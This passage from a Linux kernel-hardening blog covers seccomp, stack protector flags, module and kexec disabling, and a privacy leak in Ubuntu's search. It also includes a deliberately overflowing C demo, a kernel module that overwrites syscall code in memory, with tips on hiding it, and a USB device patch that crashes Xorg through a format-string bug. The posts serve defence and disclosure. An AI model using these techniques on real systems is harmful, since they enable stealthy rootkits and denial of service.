codeblog code is freedom — patching my itch


evolution of seccomp

Filed under: Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 10:01 am

I’m excited to see other people thinking about userspace-to-kernel attack surface reduction ideas. Theo de Raadt recently published slides describing Pledge. This uses the same ideas that seccomp implements, but with less granularity: seccomp works at the individual syscall level and, in addition to killing processes, allows for signaling, tracing, and errno spoofing. As de Raadt mentions, Pledge could be implemented with seccomp very easily: libseccomp would just categorize syscalls.

I don’t really understand the presentation’s mention of “Optional Security”, though. Pledge, like seccomp, is an opt-in feature. Nothing in the kernel refuses to run “unpledged” programs. I assume his point was that when it gets ubiquitously built into programs (like stack protector), it’s effectively not optional (which is alluded to later as “comprehensive applicability ~= mandatory mitigation”). Regardless, this sensible (though optional) design gets me back to his slide on seccomp, which seems to have a number of misunderstandings:

  • “A Turing complete eBPF program watches your program”: Strictly speaking, seccomp is implemented using a subset of BPF, not eBPF. And since BPF (and eBPF) programs are guaranteed to halt, seccomp filters are not Turing complete.
  • “Who watches the watcher?”: I don’t even understand this. It’s in the kernel. The kernel watches your program. Just like always. If this is a question of BPF program verification, there is literally a program verifier that checks various properties of the BPF program.
  • “seccomp program is stored elsewhere”: This, with the next statement, is just totally misunderstood. Programs using seccomp define their filter in their own code. It’s used the same way as the Pledge examples are shown doing.
  • “Easy to get desyncronized either program is updated”: As above, this just isn’t the case. The only place where this might be true is when using seccomp on programs that were not written natively with seccomp. In that case, yes, desync is possible. But that’s one of the advantages of seccomp’s design: a program launcher (like minijail or systemd) can declare a seccomp filter for a program that hasn’t yet been ported to use one natively.
  • “eBPF watcher has no real idea what the program under observation is doing…”: I don’t understand this statement. I don’t see how Pledge would “have a real idea” either: they’re both doing filtering. If we get AI out of our syscall filters, we’re in serious trouble. :)

OpenBSD has some interesting advantages in the syscall filtering department, especially around sockets. Right now, it’s hard for Linux syscall filtering to understand why a given socket is being used. Something like SOCK_DNS seems like it could be quite handy.

Another nice feature of Pledge is the path whitelist feature. As it’s still under development, I hope they expand this to include more things than just paths. Argument inspection is a weak point for seccomp, but under Linux, most of the arguments are ultimately exposed to the LSM layer. Last year I experimented with creating a “seccomp LSM” for path matching where programs could declare whitelists, similar to standard LSMs.

So, yes, Linux “could match this API on seccomp”. It’d just take some extensions to libseccomp to implement pledge(), as I described at the top. With OpenBSD doing a bunch of analysis work on common programs, it’d be excellent to see this usable on Linux too. So far on Linux, only a few programs (e.g. Chrome, vsftpd) have bothered to do this using seccomp, and it could be argued that this is ultimately due to how fine-grained it is.

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


3D printing Poe

Filed under: Blogging,Debian,Security,Ubuntu — kees @ 3:08 pm

I helped print this statue of Edgar Allan Poe, through “We the Builders”, who coordinate large-scale crowd-sourced 3D print jobs:

Poe's Face

You can see one of my parts here on top, with “-Kees” on the piece with the funky hair strand:

Poe's Hair

The MakerWare I run on Ubuntu works well. I wish they were correctly signing their repositories. Even if I use non-SSL to fetch their key, as their Ubuntu/Debian instructions recommend, it still doesn’t match the packages:

W: GPG error: trusty Release: The following signatures were invalid: BADSIG 3D019B838FB1487F MakerBot Industries dev team <>

And it’s not just my APT configuration:

$ wget
$ wget
$ gpg --verify Release.gpg Release
gpg: Signature made Wed 11 Mar 2015 12:43:07 PM PDT using RSA key ID 8FB1487F
gpg: requesting key 8FB1487F from hkp server
gpg: key 8FB1487F: public key "MakerBot Industries LLC (Software development team) <>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
gpg: BAD signature from "MakerBot Industries LLC (Software development team) <>"
$ grep ^Date Release
Date: Tue, 09 Jun 2015 19:41:02 UTC

Looks like they’re updating their Release file without updating the signature file. (The signature is from March, but the Release file is from June. Oops!)

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


barcode consolidation

Filed under: Blogging,Debian,General,Security,Ubuntu — kees @ 5:33 pm

I had a mess of loyalty cards filling my wallet. It kind of looked like this:

Loyalty cards, from Flickr, joelogon

They took up too much room, and I used them infrequently. The only things of value on them are the barcodes they carry, which identify my account with whatever organization they’re tied to. Other folks have talked about doing consolidation in various ways, like just scanning images of the cards and printing them all together. There was a site where you typed in card details and they generated barcodes for you, too. I didn’t want to hand my identifiers to a third party, and image scanning wasn’t flexible enough. I wanted to actually have the raw numbers, so I ended up using barcode. I didn’t use the Debian or Ubuntu package, though, since it lacked SVG support, which was added in the latest (cough March 2013) version.

I used the Android Barcode Scanner app, and just saved all the barcodes and their encoding details to a text file, noting which was which. For example:

Albertsons "035576322436","UPC_A"
Multnomah County Library "01237035218482","CODABAR"
Supportland "!0000005341632030145420","CODE_128"

I measured the barcode area, since some scanners can’t handle their expected barcodes being resized (that’s another project: find out which CAN handle it), and then spat out SVG files. I compared the results to my actual cards, since sometimes encodings have different options (like dropping checksum characters, “-c” below):

barcode-svg -S -u in -g 1.5x0.5 -e upc-a      -b '035576322436' > albertsons.svg
barcode-svg -S -u in -g   2x0.5 -e codabar -c -b '01237035218482' > library.svg
barcode-svg -S -u cm -g 4.5x1   -e code128    -b '!0000005341632030145420' > supportland.svg

With Inkscape, I opened them all and organized them onto a wallet-card-sized area, printed it, and laminated it. Now my wallet is 7 cards lighter. More room for HID cards or other stuff:

Emergency Pick Card

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


glibc select weakness fixed

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 11:21 am

In 2009, I reported this bug to glibc, describing the problem that exists when a program is using select, and has its open file descriptor resource limit raised above 1024 (FD_SETSIZE). If a network daemon starts using the FD_SET/FD_CLR glibc macros on fdset variables for descriptors numbered 1024 or higher, glibc will happily write beyond the end of the fdset variable, producing a buffer overflow condition. (This problem had existed since the introduction of the macros, so, for decades? I figured it was long overdue to have a report opened about it.)

At the time, I was told this wasn’t going to be fixed and “every program using [select] must be considered buggy.” Two years later, people were still asking for this feature and still being told “no”.

But, as it turns out, a few months after the most recent “no”, it got silently fixed anyway, with the bug left open as “Won’t Fix”! I’m glad Florian did some house-cleaning on the glibc bug tracker, since I’d otherwise never have noticed that this protection had been added to the ever-growing list of -D_FORTIFY_SOURCE=2 protections.

I’ll still recommend everyone use poll instead of select, but now I won’t be so worried when I see requests to raise the open descriptor limit above 1024.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


Linux Security Summit 2014

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 10:31 am

The Linux Security Summit is happening in Chicago August 18th and 19th, just before LinuxCon. Send us some presentation and topic proposals, and join the conversation with other like-minded people. :)

I’d love to see what people have been working on, and what they’d like to work on. Our general topics will hopefully include:

  • System hardening
  • Access control
  • Cryptography
  • Integrity control
  • Hardware security
  • Networking
  • Storage
  • Virtualization
  • Desktop
  • Tools
  • Management
  • Case studies
  • Emerging technologies, threats & techniques

The Call For Participation closes June 6th, so you’ve got about a month, but earlier is better.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


compiler hardening in Ubuntu and Debian

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 8:42 am

Back in 2006, the compiler in Ubuntu was patched to enable most build-time security-hardening features (relro, stack protector, fortify source). I wasn’t able to convince Debian to do the same, so Debian went the route of other distributions, adding security hardening flags during package builds only. I remain disappointed in this approach, because it means that someone who builds software without using the packaging tools on a non-Ubuntu system won’t get those hardening features. Think of a sysadmin trying the latest nginx, or a vendor like Valve building games for distribution. On Ubuntu, when you do that “./configure && make” you’ll get the features automatically.

Debian, at the time, didn’t have a good way forward even for package builds since it lacked a concept of “global package build flags”. Happily, a solution (via dh) was developed about 2 years ago, and Debian package maintainers have been working to adopt it ever since.

So, while I don’t think any distro can match Ubuntu’s method of security hardening compiler defaults, it is valuable to see the results of global package build flags in Debian on the package archive. I’ve had an on-going graph of the state of build hardening on both Ubuntu and Debian for a while, but only recently did I put together a comparison of a default install. Very few people have all the packages in the archive installed, so it’s a bit silly to only look at the archive statistics. But let’s start there, just to describe what’s being measured.

Here’s today’s snapshot of Ubuntu’s development archive for the past year (you can see development “opening” after a release every 6 months with an influx of new packages):

Here’s today’s snapshot of Debian’s unstable archive for the past year (at the start of May you can see the archive “unfreezing” after the Wheezy release; the gaps were my analysis tool failing):

Ubuntu’s lines are relatively flat because everything that can be built with hardening already is. Debian’s graph is on a slow upward trend as more packages get migrated to dh to gain knowledge of the global flags.

Each line in the graphs represents the count of source packages that contain binary packages that have at least 1 “hit” for a given category. “ELF” is just that: a source package that ultimately produces at least 1 binary package with at least 1 ELF binary in it (i.e. produces a compiled output). The “Read-only Relocations” (“relro”) hardening feature is almost always done for an ELF, excepting uncommon situations. As a result, the count of ELF and relro are close on Ubuntu. In fact, examining relro is a good indication of whether or not a source package got built with hardening of any kind. So, in Ubuntu, 91.5% of the archive is built with hardening, with Debian at 55.2%.

The “stack protector” and “fortify source” features depend on characteristics of the source itself, and may not always be present in a package’s binaries even when hardening is enabled for the build (e.g. no functions got selected for stack protection, or no fortified glibc functions were used). Really these lines mostly indicate the count of packages that have a sufficiently high level of complexity that would trigger such protections.

The “PIE” and “immediate binding” (“bind_now”) features are specifically enabled by a package maintainer. PIE can have a noticeable performance impact on CPU-register-starved architectures like i386 (ia32), so it is neither patched on in Ubuntu, nor part of the default flags in Debian. (And bind_now doesn’t make much sense without PIE, so they usually go together.) It’s worth noting, however, that it probably should be the default on amd64 (x86_64), which has plenty of available registers.

Here is a comparison of default installed packages between the most recent stable releases of Ubuntu (13.10) and Debian (Wheezy). It’s clear that what the average user gets with a default fresh install is better than what the archive-to-archive comparison shows. Debian’s showing is better (74% built with hardening), though it is still clearly lagging behind Ubuntu (99%):

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.



Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 2:28 pm

There will be a new option in gcc 4.9 named “-fstack-protector-strong”, which offers an improved version of “-fstack-protector” without going all the way to “-fstack-protector-all”. The stack protector feature itself adds a known canary to the stack during function preamble, and checks it when the function returns. If it changed, there was a stack overflow, and the program aborts. This is fine, but figuring out when to include it is the reason behind the various options.

Since traditionally stack overflows happen with string-based manipulations, the default (-fstack-protector) only includes the canary code when a function defines a local character array of 8 or more bytes (--param=ssp-buffer-size=N, N=8 by default). This means just a few functions get the checking, but they’re probably the most likely to need it, so it’s an okay balance. Various distributions ended up lowering their default --param=ssp-buffer-size option down to 4, since there were still cases of functions that should have been protected but the conservative gcc upstream default of 8 wasn’t covering them.

However, even with the increased function coverage, there are rare cases when a stack overflow happens on other kinds of stack variables. To handle this more paranoid concern, -fstack-protector-all was defined to add the canary to all functions. This results in substantial use of stack space for saving the canary on deep stack users, and a measurable (though surprisingly still relatively low) performance hit due to all the saving/checking. For a long time, Chrome OS used this, since we’re paranoid. :)

In the interest of gaining back some of the lost performance and not hitting our Chrome OS build images with such a giant stack-protector hammer, Han Shen from the Chrome OS compiler team created the new option -fstack-protector-strong, which enables the canary in many more conditions:

  • local variable’s address used as part of the right hand side of an assignment or function argument
  • local variable is an array (or union containing an array), regardless of array type or length
  • uses register local variables

This meant we were covering all the more paranoid conditions that might lead to a stack overflow. Chrome OS has been using this option instead of -fstack-protector-all for about 10 months now.

As a quick demonstration of the options, you can see this example program under various conditions. It tries to show off an example of shoving serialized data into a non-character variable, like might happen in some network address manipulations or streaming data parsing. Since I’m using memcpy here for clarity, the builds will need to turn off FORTIFY_SOURCE, which would also notice the overflow.

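#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A structure with no character arrays, so plain -fstack-protector skips it. */
struct no_chars {
    unsigned int len;
    unsigned int data;
};

int main(int argc, char * argv[])
{
    struct no_chars info = { };

    if (argc < 3) {
        fprintf(stderr, "Usage: %s LENGTH DATA...\n", argv[0]);
        return 1;
    }

    info.len = atoi(argv[1]);
    /* Deliberately overflows info.data when LENGTH exceeds its size. */
    memcpy(&info.data, argv[2], info.len);

    return 0;
}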
Built with everything disabled, this faults trying to return to an invalid VMA:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fno-stack-protector /tmp/boom.c -o /tmp/boom
    Segmentation fault (core dumped)

Built with FORTIFY_SOURCE enabled, we see the expected catch of the overflow in memcpy:

    $ gcc -Wall -O2 -D_FORTIFY_SOURCE=2 -fno-stack-protector /tmp/boom.c -o /tmp/boom
    *** buffer overflow detected ***: /tmp/boom terminated

So, we’ll leave FORTIFY_SOURCE disabled for our comparisons. With pre-4.9 gcc, we can see that -fstack-protector does not get triggered to protect this function:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector /tmp/boom.c -o /tmp/boom
    Segmentation fault (core dumped)

However, using -fstack-protector-all does trigger the protection, as expected:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-all /tmp/boom.c -o /tmp/boom
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)

And finally, using the gcc snapshot of 4.9, here is -fstack-protector-strong doing its job:

    $ /usr/lib/gcc-snapshot/bin/gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-strong /tmp/boom.c -o /tmp/boom
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)

For Linux 3.14, I’ve added support for -fstack-protector-strong via the new CONFIG_CC_STACKPROTECTOR_STRONG option. The old CONFIG_CC_STACKPROTECTOR will be available as CONFIG_CC_STACKPROTECTOR_REGULAR. When comparing the results on builds via size and objdump -d analysis, here’s what I found with gcc 4.9:

A normal x86_64 “defconfig” build without stack protector had a kernel text size of 11430641 bytes with 36110 function bodies. Adding CONFIG_CC_STACKPROTECTOR_REGULAR increased the kernel text size to 11468490 (a +0.33% change), with 1015 of 36110 functions stack-protected (2.81%). Using CONFIG_CC_STACKPROTECTOR_STRONG increased the kernel text size to 11692790 (+2.29%), with 7401 of 36110 functions stack-protected (20.5%). And 20% is a far cry from the 100% we would see if support for -fstack-protector-all were added back to the kernel.

The next bit of work will be figuring out the best way to detect the version of gcc in use when doing Debian package builds, and using -fstack-protector-strong instead of -fstack-protector. For Ubuntu, it’s much simpler because it’ll just be the compiler default.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


live patching the kernel

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 3:40 pm

A nice set of recent posts have done a great job detailing the remaining ways that a root user can get at kernel memory. Part of this is driven by the ideas behind UEFI Secure Boot, but they come from the same goal: making sure that the root user cannot directly subvert the running kernel. My perspective on this is toward making sure that an attacker who has gained access and then gained root privileges can’t continue to elevate their access and install invisible kernel rootkits.

An outline for possible attack vectors is spelled out by Matthew Garrett’s continuing “useful kernel lockdown” patch series. The set of attacks was examined by Tyler Borland in “Bypassing modules_disabled security”. His post describes each vector in detail, and he ultimately chooses MSR writing as the way to write kernel memory (and shows an example of how to re-enable module loading). One thing not mentioned is that many distros have MSR access as a module, and it’s rarely loaded. If modules_disabled is already set, an attacker won’t be able to load the MSR module to begin with. However, the other general-purpose vector, kexec, is still available. To prove out this method, Matthew wrote a proof-of-concept for changing kernel memory via kexec.

Chrome OS is several steps ahead here, since it has hibernation disabled, MSR writing disabled, kexec disabled, modules verified, root filesystem read-only and verified, kernel verified, and firmware verified. But since not all my machines are Chrome OS, I wanted to look at some additional protections against kexec on general-purpose distro kernels that have CONFIG_KEXEC enabled, especially those without UEFI Secure Boot and Matthew’s lockdown patch series.

My goal was to disable kexec without needing to rebuild my entire kernel. For future kernels, I have proposed adding /proc/sys/kernel/kexec_disabled, a partner to the existing modules_disabled, that will one-way toggle kexec off. For existing kernels, things got more ugly.

What options do I have for patching a running kernel?

First I looked back at what I’d done in the past with fixing vulnerabilities with systemtap. This ends up being a rather heavy-duty way to go about things, since you need all the distro kernel debug symbols, etc. It does work, but has a significant problem: since it uses kprobes, a root user can just turn off the probes, reverting the changes. So that’s not going to work.

Next I looked at ksplice. The original upstream has gone away, but there is still some work being done by Jiri Slaby. However, even with his updates which fixed various build problems, there were still more, even when building a 3.2 kernel (Ubuntu 12.04 LTS). So that’s out too, which is too bad, since ksplice does exactly what I want: modifies the running kernel’s functions via a module.

So, finally, I decided to just do it by hand, and wrote a friendly kernel rootkit. Instead of dealing with flipping page table permissions on the normally-unwritable kernel code memory, I borrowed from PaX’s KERNEXEC feature, and just turn off write protect checking on the CPU briefly to make the changes. The return values for functions on x86_64 are stored in RAX, so I just need to stuff the kexec_load syscall with “mov $-1, %rax; ret” (-1 is -EPERM):

#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>

static unsigned long long_target;
static char *target;
module_param_named(syscall, long_target, ulong, 0644);
MODULE_PARM_DESC(syscall, "Address of syscall");

/* mov $-1, %rax; ret */
unsigned const char bytes[] = { 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
                                0xc3 };
unsigned char *orig;

/* Borrowed from PaX KERNEXEC */
static inline void disable_wp(void)
{
        unsigned long cr0;

        /* stay on this CPU while its write protection is off */
        preempt_disable();
        barrier();

        cr0 = read_cr0();
        cr0 &= ~X86_CR0_WP;
        write_cr0(cr0);
}

static inline void enable_wp(void)
{
        unsigned long cr0;

        cr0 = read_cr0();
        cr0 |= X86_CR0_WP;
        write_cr0(cr0);

        barrier();
        preempt_enable();
}

static int __init syscall_eperm_init(void)
{
        int i;
        target = (char *)long_target;

        if (target == NULL)
                return -EINVAL;

        /* save original */
        orig = kmalloc(sizeof(bytes), GFP_KERNEL);
        if (!orig)
                return -ENOMEM;
        for (i = 0; i < sizeof(bytes); i++) {
                orig[i] = target[i];
        }

        pr_info("writing %zu bytes at %p\n", sizeof(bytes), target);

        /* overwrite the start of the syscall with the stub */
        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = bytes[i];
        }
        enable_wp();

        return 0;
}
module_init(syscall_eperm_init);

static void __exit syscall_eperm_exit(void)
{
        int i;

        pr_info("restoring %zu bytes at %p\n", sizeof(bytes), target);

        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = orig[i];
        }
        enable_wp();

        kfree(orig);
}
module_exit(syscall_eperm_exit);

MODULE_AUTHOR("Kees Cook <>");
MODULE_DESCRIPTION("makes target syscall always return EPERM");
MODULE_LICENSE("GPL");

If I didn’t want to leave an obvious indication that the kernel had been manipulated, the module could be changed to:

  • not announce what it’s doing
  • remove the exit route to not restore the changes on module unload
  • error out at the end of the init function instead of staying resident

And with this in place, it’s just a matter of loading it with the address of sys_kexec_load (found via /proc/kallsyms) before I disable module loading via modprobe. Here’s my upstart script:

# modules-disable - disable modules after rc scripts are done
description "disable loading modules"

start on stopped module-init-tools and stopped rc

script
        cd /root/modules/syscall_eperm
        make clean
        make
        insmod ./syscall_eperm.ko \
                syscall=0x$(egrep ' T sys_kexec_load$' /proc/kallsyms | cut -d" " -f1)
        modprobe disable
end script

And now I’m safe from kexec before I have a kernel that contains /proc/sys/kernel/kexec_disabled.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


TPM providing /dev/hwrng

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 9:10 am

A while ago, I added support for the TPM’s pRNG to the rng-tools package in Ubuntu. Since then, Kent Yoder added TPM support directly into the kernel’s /dev/hwrng device. This means there’s no need to carry the patch in rng-tools any more, since I can use /dev/hwrng directly now:

# modprobe tpm-rng
# echo tpm-rng >> /etc/modules
# grep -v ^# /etc/default/rng-tools
# service rng-tools restart

And as before, once it’s been running a while (or you send SIGUSR1 to rngd), you can see reporting in syslog:

# pkill -USR1 rngd
# tail -n 15 /var/log/syslog
Aug 13 09:51:01 linux rngd[39114]: stats: bits received from HRNG source: 260064
Aug 13 09:51:01 linux rngd[39114]: stats: bits sent to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: entropy added to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 successes: 13
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 failures: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Monobit: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Poker: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Runs: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Long run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: HRNG source speed: (min=10.433; avg=10.442; max=10.454)Kibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS tests speed: (min=73.360; avg=75.504; max=86.305)Mibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: Lowest ready-buffers level: 2
Aug 13 09:51:01 linux rngd[39114]: stats: Entropy starvations: 0
Aug 13 09:51:01 linux rngd[39114]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us

I’m pondering getting this running in Chrome OS too, but I want to make sure it doesn’t suck too much battery.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


facedancer built

Filed under: Blogging,Chrome OS,Embedded,Security,Ubuntu,Ubuntu-Server — kees @ 2:39 pm

I finally had the time to put together the facedancer11 that Travis Goodspeed was kind enough to give me. I had ordered all the parts some time ago, but had been dreading the careful surface-mount soldering work it was going to require. As it turned out, I’m not half bad at it: everything seems to have worked the first time through. I did, however, fail to order 33ohm 0603 resistors, so I have some temporary ones in use until I can replace them.

My facedancer

This device allows the HOST side computer to drive USB protocol communication at the packet level, with the TARGET seeing a USB device on the other end. No more needing to write careful embedded code while breaking USB stacks: the fake USB device can be controlled with Python.

This means I’m able to start some more serious fuzzing of the USB protocol layer. There is already code for emulating HID (Keyboard), Mass Storage, and now Firmware Updates. There’s probably tons to look at just in that. For some background on the fun to be had just with Mass Storage devices, see Goodspeed’s 29C3 presentation on it.

© 2013 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


clean module disabling

Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 3:55 pm

I think I found a way to make disabling kernel module loading (via /proc/sys/kernel/modules_disabled) easier for server admins. Right now there’s kind of a weird problem on some distros where reading /etc/modules races with reading /etc/sysctl.{conf,d}. In these cases, you can’t just put “kernel.modules_disabled=1” in the latter since you might not have finished loading modules from /etc/modules.

Before now, on my own systems, I’d added the sysctl call to my /etc/rc.local, which seems like a hack — that file is related to neither sysctl nor modules and both subsystems have their own configuration files, but it does happen absolutely last.

Instead, I’ve now defined “disable” as a modprobe alias via /etc/modprobe.d/disable.conf:

# To disable module loading after boot, "modprobe disable" can be used to
# set the sysctl that controls module loading.
install disable /sbin/sysctl kernel.modules_disabled=1

And then in /etc/modules I can list all the modules I actually need, and then put “disable” on the last line. (Or, if I want to not remember the sysctl path, I can manually run “modprobe disable” to turn off modules at some later point.)

I think it’d be cool if this became an internal alias in upstream kmod.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


product search in Ubuntu 12.10

Filed under: Blogging,Security,Ubuntu,Web — kees @ 3:18 pm

The EFF has already discussed the product search “feature” in Ubuntu 12.10’s Unity UI. Ways for disabling it are covered:

  • sudo apt-get remove unity-lens-shopping – it isn’t easy to generally blacklist a package, it might end up getting re-installed later, etc.
  • System Settings / Privacy / Search Results – the naming says nothing about it disabling product search results.
  • use a UI other than Unity – this is what I do.

Here’s another way, that overrides the URL used for the product searching (restart your session after making this change):

$ sudo -s
# echo 'OFFERS_URI="https://localhost:0/"' >> /etc/environment

Or, if you run an organization where you build devices that run Ubuntu, and want to snoop on all the things people type into their Unity search bar, just change that to a URL you control.

I’m astonished by Canonical’s blatant disregard for providing a way to opt-in to this gaping privacy hole. This is a dramatic case of “calling home”, and provides a large amount of information about the user, in real-time. Besides sending the content of their searches and the version of the software installed, it also sends every keystroke, which means in some weird cases, even passive observers can examine keystroke timing which has been shown to potentially leak what is being typed:

- - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=p HTTP/1.1" 404 522 "-" "Unity Shopping Lens 6.8.0"
- - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=pw HTTP/1.1" 404 521 "-" "Unity Shopping Lens 6.8.0"
- - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=pwn HTTP/1.1" 404 521 "-" "Unity Shopping Lens 6.8.0"

Ubuntu is a general-purpose OS, with Unity as its default interface. It is not a vendor-tied appliance nor a telephone company device, and Unity is not a browser (in fact, even in a browser there are visual indicators of where what you have typed will go).

Even if the default for this is enabled, there needs to be (likely at install-time) a page describing what to expect, and the system owner can choose “yes, search online” or “no thanks”. This behavior needs to be fixed in 13.04 and SRUed into 12.10. If there is no fast solution, then it just needs to be disabled by default until it has a sane notification flow.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


Link restrictions released in Linux 3.6

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 12:59 pm

It’s been a very long time coming, but symlink and hardlink restrictions have finally landed in the mainline Linux kernel as of version 3.6. The protection is at least old enough to have a driver’s license in most US states, with some of the first discussions I could find dating from Aug 1996.

While this protection is old (to ancient) news for anyone running Chrome OS, Ubuntu, grsecurity, or OpenWall, I’m extremely excited that it can now benefit everyone running Linux. All the way from cloud monstrosities to cell phones, an entire class of vulnerability just goes away. Thanks to everyone that had a part in developing, testing, reviewing, and encouraging these changes over the years. It’s quite a relief to have it finally done. I hope I never have to include the year in my patch revision serial number again. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.



At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to “%n”.

Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to “%n” would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn’t a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a “normal” (USB) keyboard.
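The general class of bug can be sketched in a few lines of C. This is not Xorg’s actual logging code; format_device_log() and the “input device: ” prefix are made up for illustration. The point is only that a name supplied by a device must be passed as an argument to a fixed format string, never used as (or spliced into) the format itself:

```c
#include <stdio.h>

/*
 * Hypothetical helper (not an Xorg function): build a log line for a
 * newly attached input device whose name comes from the device itself.
 */
int format_device_log(char *out, size_t outlen, const char *device_name)
{
    /*
     * Unsafe: snprintf(out, outlen, device_name);
     * A name such as "%n" would then be interpreted as a directive.
     *
     * Safe: the name is only ever data for a constant "%s".
     */
    return snprintf(out, outlen, "input device: %s", device_name);
}
```

Called with the name “Keyboard (%n%n%n%n)”, this just copies the name into the buffer. In the unsafe form, a program built with -D_FORTIFY_SOURCE=2 gets aborted by glibc when it sees %n in a format string that lives in writable memory.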

I borrowed a “Maximus” USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus.

I added a rule for it to udev:

SUBSYSTEM=="usb", ACTION=="add", ATTR{idVendor}=="03eb", ATTR{idProduct}=="*", GROUP="plugdev"

installed the AVR tools:

sudo apt-get install dfu-programmer gcc-avr avr-libc

and pulled down the excellent LUFA USB tree:

git clone git://

After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:

-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"

In fact, it was so successful that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)

make dfu

After a reboot, I switched it back to programming mode by pressing and holding the “H” button, press/releasing the “R” button, and releasing “H”.

The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:

echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default

Be careful of shared internal/external ports, and having two buses on one port, etc.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


keeping your process unprivileged

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 1:17 pm

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski.

If you’re not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a “leaf node” in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children cannot gain new privileges (like through running a setuid binary). This produces some fun results, since things like the “ping” tool expect to gain enough privileges to open a raw socket. If you set nnp to “1”, suddenly that can’t happen any more.

Here’s a quick example that sets nnp, and tries to run the command line arguments:

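#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif

int main(int argc, char * argv[])
{
        /* Need at least a command to run. */
        if (argc < 2)
                return 1;

        /* Once set, nnp cannot be unset and is inherited by children. */
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
                perror("prctl(PR_SET_NO_NEW_PRIVS)");
                return 1;
        }

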